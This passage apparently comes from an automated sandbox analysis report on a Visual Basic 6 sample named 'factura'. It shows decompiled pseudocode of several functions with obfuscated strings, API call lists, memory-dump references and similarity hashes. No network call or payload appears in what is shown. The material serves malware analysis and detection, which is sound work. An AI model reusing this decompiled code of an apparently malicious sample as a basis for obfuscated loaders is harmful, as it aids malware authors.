        					if(_v96 >= 0) {
        						_v116 = _v116 & 0x00000000;
        					} else {
        						_push(0x58);
        						_push(0x402a8c);
        						_push(_v92);
        						_push(_v96);
        						L00401654();
        						_v116 = _t87;
        					}
        					_push( &_v44);
        					_t75 =  &_v48;
        					_push(_t75);
        					_push(2);
        					L00401594();
        				}
        				_push(E00409ADD);
        				L004015E8();
        				L0040166C();
        				L0040166C();
        				return _t75;
        			}
































        0x004098be
        0x004098cd
        0x004098d7
        0x004098df
        0x004098e2
        0x004098e9
        0x004098f8
        0x00409901
        0x0040990e
        0x00409913
        0x00409915
        0x00409918
        0x00409922
        0x00409927
        0x00409928
        0x0040992d
        0x00409934
        0x0040993a
        0x00409941
        0x0040994c
        0x0040994e
        0x00409950
        0x00409955
        0x00409955
        0x0040995a
        0x00409961
        0x0040996e
        0x00409973
        0x00409976
        0x00409977
        0x00409981
        0x00409986
        0x00409987
        0x00409989
        0x00409990
        0x00409995
        0x0040999c
        0x004099a4
        0x004099a9
        0x004099af
        0x004099bc
        0x004099d6
        0x004099be
        0x004099be
        0x004099c3
        0x004099c8
        0x004099cd
        0x004099cd
        0x004099e2
        0x004099f1
        0x004099f4
        0x004099f6
        0x004099fd
        0x00409a16
        0x004099ff
        0x004099ff
        0x00409a01
        0x00409a06
        0x00409a09
        0x00409a0c
        0x00409a11
        0x00409a11
        0x00409a1d
        0x00409a20
        0x00409a27
        0x00409a30
        0x00409a31
        0x00409a3b
        0x00409a3c
        0x00409a3d
        0x00409a3e
        0x00409a47
        0x00409a4d
        0x00409a51
        0x00409a5f
        0x00409a62
        0x00409a64
        0x00409a6b
        0x00409a84
        0x00409a6d
        0x00409a6d
        0x00409a6f
        0x00409a74
        0x00409a77
        0x00409a7a
        0x00409a7f
        0x00409a7f
        0x00409a8b
        0x00409a8c
        0x00409a8f
        0x00409a90
        0x00409a92
        0x00409a97
        0x00409a9a
        0x00409ac7
        0x00409acf
        0x00409ad7
        0x00409adc

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 004098D7
        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409901
        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0040990E
        • #514.MSVBVM60(?,00000002,?,?,?,?,00401426), ref: 00409918
        • __vbaStrMove.MSVBVM60(?,00000002,?,?,?,?,00401426), ref: 00409922
        • __vbaStrCmp.MSVBVM60(00402954,00000000,?,00000002,?,?,?,?,00401426), ref: 0040992D
        • __vbaFreeStr.MSVBVM60(00402954,00000000,?,00000002,?,?,?,?,00401426), ref: 00409941
        • #580.MSVBVM60(KNLE,00000001,00402954,00000000,?,00000002,?,?,?,?,00401426), ref: 00409955
        • __vbaVarDup.MSVBVM60 ref: 0040996E
        • #667.MSVBVM60(?), ref: 00409977
        • __vbaStrMove.MSVBVM60(?), ref: 00409981
        • __vbaStrCmp.MSVBVM60(00000000,00000000,?), ref: 00409989
        • __vbaFreeStr.MSVBVM60(00000000,00000000,?), ref: 0040999C
        • __vbaFreeVar.MSVBVM60(00000000,00000000,?), ref: 004099A4
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,00000000,00000000,?), ref: 004099C8
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,0000001C,?,?,?,?,00000000,00000000,?), ref: 00409A0C
        • __vbaChkstk.MSVBVM60(?,?,?,?,00000000,00000000,?), ref: 00409A31
        • __vbaCastObj.MSVBVM60(?,00402A7C,?,?,?,?,00000000,00000000,?), ref: 00409A47
        • __vbaObjSet.MSVBVM60(00000000,00000000,?,00402A7C,?,?,?,?,00000000,00000000,?), ref: 00409A51
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402A8C,00000058,?,?,?,?,00000000,00000000,?), ref: 00409A7A
        • __vbaFreeObjList.MSVBVM60(00000002,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00409A92
        • __vbaFreeObj.MSVBVM60(00409ADD,00000000,00000000,?), ref: 00409AC7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$CheckChkstkCopyHresultMove$#514#580#667CastListNew2
        • String ID: ABC$KNLE$tmp
        • API String ID: 1916041330-2148770640
        • Opcode ID: a85c4000936b98f3f8b558e75a1f703c7eef4482431bf3278b2ef6f7d5fdba52
        • Instruction ID: f5d7ee50bda3a6f9f62531cf6a49d83dbd315f34c405ac98cf4d3aadfb619591
        • Opcode Fuzzy Hash: a85c4000936b98f3f8b558e75a1f703c7eef4482431bf3278b2ef6f7d5fdba52
        • Instruction Fuzzy Hash: 4551E871A40249ABCB10EFE5CC46BEEBBB4AF14704F10452AE406BB1E1DBB95945CB58
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 34%
        			E004089D8(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0) {
        				intOrPtr _v8;
        				long long* _v12;
        				char _v24;
        				intOrPtr _v28;
        				signed int _v36;
        				char _v44;
        				char _v60;
        				char _v76;
        				char _v92;
        				char _v112;
        				char* _v120;
        				char _v128;
        				char* _v136;
        				intOrPtr _v144;
        				intOrPtr _v152;
        				intOrPtr _v160;
        				void* _v180;
        				signed int _v184;
        				signed int _v192;
        				intOrPtr* _v196;
        				signed int _v200;
        				short _t73;
        				char* _t83;
        				signed int _t91;
        				void* _t99;
        				long long* _t115;
        				long long* _t116;
        				short _t117;
        				long long _t121;
        
        				_t121 = __fp0;
        				_t99 = __ecx;
        				_push(__ecx);
        				_push(__ecx);
        				_push(0x401426);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t115;
        				L00401420();
        				_v12 = _t115;
        				_v8 = 0x401238;
        				_push( &_v44);
        				L00401606();
        				_push( &_v44);
        				asm("fld1");
        				_push(__ecx);
        				_push(__ecx);
        				 *_t115 = __fp0;
        				_push(0x4028c8);
        				_push( &_v60);
        				L0040160C();
        				_push( &_v76);
        				L00401606();
        				_v120 = 1;
        				_v128 = 2;
        				_push( &_v60);
        				_push( &_v76);
        				_push( &_v128);
        				_t73 =  &_v92;
        				_push(_t73);
        				L0040162A();
        				_push(_t73);
        				L00401612();
        				_v180 = _t73;
        				_push( &_v92);
        				_push( &_v60);
        				_push( &_v76);
        				_push( &_v44);
        				_push(4);
        				L00401600();
        				_t116 = _t115 + 0x14;
        				_t117 = _v180;
        				if(_t117 != 0) {
        					_v120 = L"Rumorer8";
        					_v128 = 8;
        					_v152 = 0x35b2bc;
        					_v160 = 3;
        					_push(0x10);
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(0x10);
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(2);
        					_push(L"iWttTKulK1qrU139");
        					_push(_v28);
        					L004015FA();
        					_t116 = _t116 + 0x2c;
        				}
        				_v36 = 1;
        				_v44 = 2;
        				_push( &_v44);
        				asm("fld1");
        				_push(_t99);
        				_push(_t99);
        				_v92 = _t121;
        				asm("fld1");
        				_push(_t99);
        				_push(_t99);
        				 *_t116 = _t121;
        				asm("fld1");
        				_push(_t99);
        				_push(_t99);
        				 *_t116 = _t121;
        				_push(_t99);
        				_push(_t99);
        				 *_t116 =  *0x401230;
        				L004015EE();
        				L004015F4();
        				asm("fcomp qword [0x401228]");
        				asm("fnstsw ax");
        				asm("sahf");
        				if(_t117 == 0) {
        					_v192 = _v192 & 0x00000000;
        				} else {
        					_v192 = 1;
        				}
        				_v180 =  ~_v192;
        				L0040164E();
        				if(_v180 != 0) {
        					if( *0x40c33c != 0) {
        						_v196 = 0x40c33c;
        					} else {
        						_push(0x40c33c);
        						_push(0x4026e4);
        						L0040165A();
        						_v196 = 0x40c33c;
        					}
        					_v180 =  *_v196;
        					_v136 = L"REINHOLTS";
        					_v144 = 8;
        					_v120 = 0x20;
        					_v128 = 2;
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_t91 =  *((intOrPtr*)( *_v180 + 0x38))(_v180, 0x10, 0x10,  &_v44);
        					asm("fclex");
        					_v184 = _t91;
        					if(_v184 >= 0) {
        						_v200 = _v200 & 0x00000000;
        					} else {
        						_push(0x38);
        						_push(0x4026d4);
        						_push(_v180);
        						_push(_v184);
        						L00401654();
        						_v200 = _t91;
        					}
        					_push( &_v44);
        					_push( &_v112);
        					L00401660();
        					_push( &_v112);
        					_push( &_v24);
        					L00401666();
        					L0040164E();
        				}
        				asm("wait");
        				_push(E00408C98);
        				_t83 =  &_v24;
        				_push(_t83);
        				_push(0);
        				L00401618();
        				L004015E8();
        				return _t83;
        			}
































        0x004089d8
        0x004089d8
        0x004089db
        0x004089dc
        0x004089dd
        0x004089e8
        0x004089e9
        0x004089f5
        0x004089fd
        0x00408a00
        0x00408a0a
        0x00408a0b
        0x00408a13
        0x00408a14
        0x00408a16
        0x00408a17
        0x00408a18
        0x00408a1b
        0x00408a23
        0x00408a24
        0x00408a2c
        0x00408a2d
        0x00408a32
        0x00408a39
        0x00408a43
        0x00408a47
        0x00408a4b
        0x00408a4c
        0x00408a4f
        0x00408a50
        0x00408a55
        0x00408a56
        0x00408a5b
        0x00408a65
        0x00408a69
        0x00408a6d
        0x00408a71
        0x00408a72
        0x00408a74
        0x00408a79
        0x00408a83
        0x00408a85
        0x00408a87
        0x00408a8e
        0x00408a95
        0x00408a9f
        0x00408aa9
        0x00408aac
        0x00408ab6
        0x00408ab7
        0x00408ab8
        0x00408ab9
        0x00408aba
        0x00408abd
        0x00408aca
        0x00408acb
        0x00408acc
        0x00408acd
        0x00408ace
        0x00408ad0
        0x00408ad5
        0x00408ad8
        0x00408add
        0x00408add
        0x00408ae0
        0x00408ae7
        0x00408af1
        0x00408af2
        0x00408af4
        0x00408af5
        0x00408af6
        0x00408af9
        0x00408afb
        0x00408afc
        0x00408afd
        0x00408b00
        0x00408b02
        0x00408b03
        0x00408b04
        0x00408b0d
        0x00408b0e
        0x00408b0f
        0x00408b12
        0x00408b17
        0x00408b1c
        0x00408b22
        0x00408b24
        0x00408b25
        0x00408b33
        0x00408b27
        0x00408b27
        0x00408b27
        0x00408b42
        0x00408b4c
        0x00408b5a
        0x00408b67
        0x00408b84
        0x00408b69
        0x00408b69
        0x00408b6e
        0x00408b73
        0x00408b78
        0x00408b78
        0x00408b96
        0x00408b9c
        0x00408ba6
        0x00408bb0
        0x00408bb7
        0x00408bc5
        0x00408bd2
        0x00408bd3
        0x00408bd4
        0x00408bd5
        0x00408bd9
        0x00408be3
        0x00408be4
        0x00408be5
        0x00408be6
        0x00408bf5
        0x00408bf8
        0x00408bfa
        0x00408c07
        0x00408c29
        0x00408c09
        0x00408c09
        0x00408c0b
        0x00408c10
        0x00408c16
        0x00408c1c
        0x00408c21
        0x00408c21
        0x00408c33
        0x00408c37
        0x00408c38
        0x00408c40
        0x00408c44
        0x00408c45
        0x00408c4d
        0x00408c4d
        0x00408c52
        0x00408c53
        0x00408c84
        0x00408c87
        0x00408c88
        0x00408c8a
        0x00408c92
        0x00408c97

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 004089F5
        • #610.MSVBVM60(?,?,?,?,?,00401426), ref: 00408A0B
        • #661.MSVBVM60(?,004028C8,?,?,?,?,?,?,?,?,00401426), ref: 00408A24
        • #610.MSVBVM60(?,?,004028C8,?,?,?,?,?,?,?,?,00401426), ref: 00408A2D
        • __vbaVarAdd.MSVBVM60(?,00000002,?,?), ref: 00408A50
        • __vbaVarTstNe.MSVBVM60(00000000,?,00000002,?,?), ref: 00408A56
        • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,00000002,?,?), ref: 00408A74
        • __vbaChkstk.MSVBVM60 ref: 00408AAC
        • __vbaChkstk.MSVBVM60 ref: 00408ABD
        • __vbaLateMemCall.MSVBVM60(?,iWttTKulK1qrU139,00000002), ref: 00408AD8
        • #673.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00408B12
        • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00408B17
        • __vbaFreeVar.MSVBVM60 ref: 00408B4C
        • __vbaNew2.MSVBVM60(004026E4,0040C33C), ref: 00408B73
        • __vbaChkstk.MSVBVM60(00000002), ref: 00408BC5
        • __vbaChkstk.MSVBVM60(00000002), ref: 00408BD9
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000038), ref: 00408C1C
        • __vbaVar2Vec.MSVBVM60(?,00000002), ref: 00408C38
        • __vbaAryMove.MSVBVM60(?,?,?,00000002), ref: 00408C45
        • __vbaFreeVar.MSVBVM60(?,?,?,00000002), ref: 00408C4D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Chkstk$Free$#610$#661#673CallCheckHresultLateListMoveNew2Var2
        • String ID: $REINHOLTS$Rumorer8$iWttTKulK1qrU139
        • API String ID: 718425485-844045677
        • Opcode ID: 3f6b65ca790feb2b03a6d06964ea2b0c2595d5921232dd65a39c9c4915ef72e0
        • Instruction ID: 880f4101add5cb4b96713ced809c00900b9153bcdd2cbeb6c8218808e7917747
        • Opcode Fuzzy Hash: 3f6b65ca790feb2b03a6d06964ea2b0c2595d5921232dd65a39c9c4915ef72e0
        • Instruction Fuzzy Hash: 67715BB1800208EBDB11EF91CD46BDEB7B9BF08704F0446AEF544B7191DBB95A848F69
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 200 409485-4094c4 __vbaChkstk __vbaStrCopy 201 4094c6-4094dc __vbaNew2 200->201 202 4094de 200->202 203 4094e5-409505 201->203 202->203 205 409507-40951c __vbaHresultCheckObj 203->205 206 40951e 203->206 207 409522-409540 205->207 206->207 209 409542-409557 __vbaHresultCheckObj 207->209 210 409559 207->210 211 40955d-40957a __vbaFreeObj 209->211 210->211 212 409640-409671 __vbaVarErrI4 #559 __vbaFreeVar 211->212 213 409580-40959b 211->213 214 409673-40967a 212->214 215 4096e9-40970b __vbaFreeStr 212->215 221 4095b7 213->221 222 40959d-4095b5 __vbaHresultCheckObj 213->222 217 409694 214->217 218 40967c-409692 __vbaNew2 214->218 220 40969b-4096c4 __vbaObjSetAddref 217->220 218->220 227 4096c6-4096db __vbaHresultCheckObj 220->227 228 4096dd 220->228 223 4095bb-4095c2 221->223 222->223 225 4095c4-4095da __vbaNew2 223->225 226 4095dc 223->226 229 4095e3-40961b __vbaObjSet 225->229 226->229 230 4096e1-4096e4 __vbaFreeObj 227->230 228->230 232 409634 229->232 233 40961d-409632 __vbaHresultCheckObj 229->233 230->215 234 409638-40963b __vbaFreeObj 232->234 233->234 234->212
        C-Code - Quality: 56%
        			E00409485(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				void* _v24;
        				signed int _v28;
        				char _v32;
        				char _v48;
        				char _v52;
        				signed int _v56;
        				signed int _v60;
        				signed int _v64;
        				signed int _v68;
        				short _v72;
        				signed int _v80;
        				intOrPtr* _v84;
        				signed int _v88;
        				signed int _v92;
        				signed int _v96;
        				intOrPtr* _v100;
        				signed int _v104;
        				intOrPtr* _v108;
        				signed int _v112;
        				signed int _t102;
        				signed int _t107;
        				char* _t112;
        				signed int _t113;
        				signed int* _t116;
        				signed int _t122;
        				char* _t126;
        				signed int _t129;
        				intOrPtr _t146;
        
        				_push(0x401426);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t146;
        				_push(0x5c);
        				L00401420();
        				_v12 = _t146;
        				_v8 = 0x4012c8;
        				L0040163C();
        				if( *0x40c33c != 0) {
        					_v84 = 0x40c33c;
        				} else {
        					_push(0x40c33c);
        					_push(0x4026e4);
        					L0040165A();
        					_v84 = 0x40c33c;
        				}
        				_v56 =  *_v84;
        				_t102 =  *((intOrPtr*)( *_v56 + 0x4c))(_v56,  &_v28);
        				asm("fclex");
        				_v60 = _t102;
        				if(_v60 >= 0) {
        					_v88 = _v88 & 0x00000000;
        				} else {
        					_push(0x4c);
        					_push(0x4026d4);
        					_push(_v56);
        					_push(_v60);
        					L00401654();
        					_v88 = _t102;
        				}
        				_v64 = _v28;
        				_t107 =  *((intOrPtr*)( *_v64 + 0x20))(_v64,  &_v52);
        				asm("fclex");
        				_v68 = _t107;
        				if(_v68 >= 0) {
        					_v92 = _v92 & 0x00000000;
        				} else {
        					_push(0x20);
        					_push(0x4029f0);
        					_push(_v64);
        					_push(_v68);
        					L00401654();
        					_v92 = _t107;
        				}
        				_v72 =  ~(0 | _v52 != 0x00000000);
        				L004015E8();
        				if(_v72 != 0) {
        					_t122 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v28);
        					asm("fclex");
        					_v56 = _t122;
        					if(_v56 >= 0) {
        						_v96 = _v96 & 0x00000000;
        					} else {
        						_push(0x160);
        						_push(0x402484);
        						_push(_a4);
        						_push(_v56);
        						L00401654();
        						_v96 = _t122;
        					}
        					if( *0x40c33c != 0) {
        						_v100 = 0x40c33c;
        					} else {
        						_push(0x40c33c);
        						_push(0x4026e4);
        						L0040165A();
        						_v100 = 0x40c33c;
        					}
        					_v60 =  *_v100;
        					_v80 = _v28;
        					_v28 = _v28 & 0x00000000;
        					_t126 =  &_v32;
        					L0040159A();
        					_t129 =  *((intOrPtr*)( *_v60 + 0x40))(_v60, _t126, _t126, _v80, L"Costards1");
        					asm("fclex");
        					_v64 = _t129;
        					if(_v64 >= 0) {
        						_v104 = _v104 & 0x00000000;
        					} else {
        						_push(0x40);
        						_push(0x4026d4);
        						_push(_v60);
        						_push(_v64);
        						L00401654();
        						_v104 = _t129;
        					}
        					L004015E8();
        				}
        				_push(0x889);
        				_t112 =  &_v48;
        				_push(_t112);
        				L00401588();
        				_push(_t112);
        				L0040158E();
        				_v56 =  ~(0 | _t112 != 0x0000ffff);
        				L0040164E();
        				_t113 = _v56;
        				if(_t113 != 0) {
        					if( *0x40c33c != 0) {
        						_v108 = 0x40c33c;
        					} else {
        						_push(0x40c33c);
        						_push(0x4026e4);
        						L0040165A();
        						_v108 = 0x40c33c;
        					}
        					_v56 =  *_v108;
        					_t116 =  &_v28;
        					L00401582();
        					_t113 =  *((intOrPtr*)( *_v56 + 0x10))(_v56, _t116, _t116, _a4);
        					asm("fclex");
        					_v60 = _t113;
        					if(_v60 >= 0) {
        						_v112 = _v112 & 0x00000000;
        					} else {
        						_push(0x10);
        						_push(0x4026d4);
        						_push(_v56);
        						_push(_v60);
        						L00401654();
        						_v112 = _t113;
        					}
        					L004015E8();
        				}
        				_push(E0040970C);
        				L0040166C();
        				return _t113;
        			}

































        0x0040948a
        0x00409495
        0x00409496
        0x0040949d
        0x004094a0
        0x004094a8
        0x004094ab
        0x004094b8
        0x004094c4
        0x004094de
        0x004094c6
        0x004094c6
        0x004094cb
        0x004094d0
        0x004094d5
        0x004094d5
        0x004094ea
        0x004094f9
        0x004094fc
        0x004094fe
        0x00409505
        0x0040951e
        0x00409507
        0x00409507
        0x00409509
        0x0040950e
        0x00409511
        0x00409514
        0x00409519
        0x00409519
        0x00409525
        0x00409534
        0x00409537
        0x00409539
        0x00409540
        0x00409559
        0x00409542
        0x00409542
        0x00409544
        0x00409549
        0x0040954c
        0x0040954f
        0x00409554
        0x00409554
        0x00409568
        0x0040956f
        0x0040957a
        0x0040958c
        0x00409592
        0x00409594
        0x0040959b
        0x004095b7
        0x0040959d
        0x0040959d
        0x004095a2
        0x004095a7
        0x004095aa
        0x004095ad
        0x004095b2
        0x004095b2
        0x004095c2
        0x004095dc
        0x004095c4
        0x004095c4
        0x004095c9
        0x004095ce
        0x004095d3
        0x004095d3
        0x004095e8
        0x004095ee
        0x004095f1
        0x004095fd
        0x00409601
        0x0040960f
        0x00409612
        0x00409614
        0x0040961b
        0x00409634
        0x0040961d
        0x0040961d
        0x0040961f
        0x00409624
        0x00409627
        0x0040962a
        0x0040962f
        0x0040962f
        0x0040963b
        0x0040963b
        0x00409640
        0x00409645
        0x00409648
        0x00409649
        0x0040964e
        0x0040964f
        0x0040965f
        0x00409666
        0x0040966b
        0x00409671
        0x0040967a
        0x00409694
        0x0040967c
        0x0040967c
        0x00409681
        0x00409686
        0x0040968b
        0x0040968b
        0x004096a0
        0x004096a6
        0x004096aa
        0x004096b8
        0x004096bb
        0x004096bd
        0x004096c4
        0x004096dd
        0x004096c6
        0x004096c6
        0x004096c8
        0x004096cd
        0x004096d0
        0x004096d3
        0x004096d8
        0x004096d8
        0x004096e4
        0x004096e4
        0x004096e9
        0x00409706
        0x0040970b

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 004094A0
        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 004094B8
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 004094D0
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,0000004C), ref: 00409514
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F0,00000020), ref: 0040954F
        • __vbaFreeObj.MSVBVM60(00000000,?,004029F0,00000020), ref: 0040956F
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402484,00000160), ref: 004095AD
        • __vbaNew2.MSVBVM60(004026E4,0040C33C), ref: 004095CE
        • __vbaObjSet.MSVBVM60(?,?,Costards1), ref: 00409601
        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004026D4,00000040), ref: 0040962A
        • __vbaFreeObj.MSVBVM60(00000000,00000000,004026D4,00000040), ref: 0040963B
        • __vbaVarErrI4.MSVBVM60(?,00000889), ref: 00409649
        • #559.MSVBVM60(00000000,?,00000889), ref: 0040964F
        • __vbaFreeVar.MSVBVM60(00000000,?,00000889), ref: 00409666
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,00000000,?,00000889), ref: 00409686
        • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,00000889), ref: 004096AA
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000010), ref: 004096D3
        • __vbaFreeObj.MSVBVM60(00000000,?,004026D4,00000010), ref: 004096E4
        • __vbaFreeStr.MSVBVM60(0040970C,00000000,?,00000889), ref: 00409706
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$CheckFreeHresult$New2$#559AddrefChkstkCopy
        • String ID: Costards1
        • API String ID: 2062356824-983065347
        • Opcode ID: 79320e2258aa1bd2f54c550f4a784e0edc4bd1abc6baadf7dc0da4e9e2974dd9
        • Instruction ID: 9696c91850d8b0885cc38532748bce0871f5c0a065db3ae38637a4983a0ef20f
        • Opcode Fuzzy Hash: 79320e2258aa1bd2f54c550f4a784e0edc4bd1abc6baadf7dc0da4e9e2974dd9
        • Instruction Fuzzy Hash: B4811270D10209EFCF00EFA1D989BADBBB4AF18304F20852AF505BB2E1DB795945DB48
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 55%
        			E0040A68E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				short _v24;
        				intOrPtr _v28;
        				signed int _v32;
        				intOrPtr _v36;
        				char _v40;
        				char _v56;
        				intOrPtr* _v60;
        				signed int _v64;
        				intOrPtr* _v72;
        				signed int _v76;
        				signed int _t31;
        				char* _t34;
        				char* _t35;
        				intOrPtr _t52;
        
        				_push(0x401426);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t52;
        				_t31 = 0x38;
        				L00401420();
        				_v12 = _t52;
        				_v8 = 0x4013c8;
        				L0040163C();
        				_push(0);
        				_push(0xffffffff);
        				_push(1);
        				_push(0);
        				_push(0x402bb8);
        				_push(_v36);
        				L004014DA();
        				L00401678();
        				_push(_v36);
        				_push(0x402bc0);
        				L0040167E();
        				if(_t31 != 0) {
        					_push(0x3e);
        					L00401642();
        					_v32 = _t31;
        				}
        				_push(0x4029c4);
        				L004014D4();
        				if(_t31 != 1) {
        					if( *0x40c33c != 0) {
        						_v72 = 0x40c33c;
        					} else {
        						_push(0x40c33c);
        						_push(0x4026e4);
        						L0040165A();
        						_v72 = 0x40c33c;
        					}
        					_v60 =  *_v72;
        					_t34 =  &_v56;
        					L0040152E();
        					L00401534();
        					_t35 =  &_v40;
        					L00401582();
        					_t31 =  *((intOrPtr*)( *_v60 + 0xc))(_v60, _t35, _t35, _t34, _t34, _t34, _v28, L"YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30", 0);
        					asm("fclex");
        					_v64 = _t31;
        					if(_v64 >= 0) {
        						_v76 = _v76 & 0x00000000;
        					} else {
        						_push(0xc);
        						_push(0x4026d4);
        						_push(_v60);
        						_push(_v64);
        						L00401654();
        						_v76 = _t31;
        					}
        					L004015E8();
        					L0040164E();
        				}
        				_v24 = 0x3b49;
        				_push(E0040A7DD);
        				L004015E8();
        				L0040166C();
        				return _t31;
        			}



















        0x0040a693
        0x0040a69e
        0x0040a69f
        0x0040a6a8
        0x0040a6a9
        0x0040a6b1
        0x0040a6b4
        0x0040a6c3
        0x0040a6c8
        0x0040a6ca
        0x0040a6cc
        0x0040a6ce
        0x0040a6d0
        0x0040a6d5
        0x0040a6d8
        0x0040a6e2
        0x0040a6e7
        0x0040a6ea
        0x0040a6ef
        0x0040a6f6
        0x0040a6f8
        0x0040a6fa
        0x0040a6ff
        0x0040a6ff
        0x0040a702
        0x0040a707
        0x0040a710
        0x0040a71d
        0x0040a737
        0x0040a71f
        0x0040a71f
        0x0040a724
        0x0040a729
        0x0040a72e
        0x0040a72e
        0x0040a743
        0x0040a750
        0x0040a754
        0x0040a75d
        0x0040a763
        0x0040a767
        0x0040a775
        0x0040a778
        0x0040a77a
        0x0040a781
        0x0040a79a
        0x0040a783
        0x0040a783
        0x0040a785
        0x0040a78a
        0x0040a78d
        0x0040a790
        0x0040a795
        0x0040a795
        0x0040a7a1
        0x0040a7a9
        0x0040a7a9
        0x0040a7ae
        0x0040a7b4
        0x0040a7cf
        0x0040a7d7
        0x0040a7dc

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040A6A9
        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0040A6C3
        • #712.MSVBVM60(?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A6D8
        • __vbaStrMove.MSVBVM60(?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A6E2
        • __vbaStrCmp.MSVBVM60(00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A6EF
        • #569.MSVBVM60(0000003E,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A6FA
        • __vbaI2Str.MSVBVM60(004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A707
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A729
        • __vbaLateMemCallLd.MSVBVM60(?,?,YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30,00000000,004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000), ref: 0040A754
        • __vbaObjVar.MSVBVM60(00000000), ref: 0040A75D
        • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 0040A767
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,0000000C), ref: 0040A790
        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040A7A1
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040A7A9
        • __vbaFreeObj.MSVBVM60(0040A7DD,004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A7CF
        • __vbaFreeStr.MSVBVM60(0040A7DD,004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A7D7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
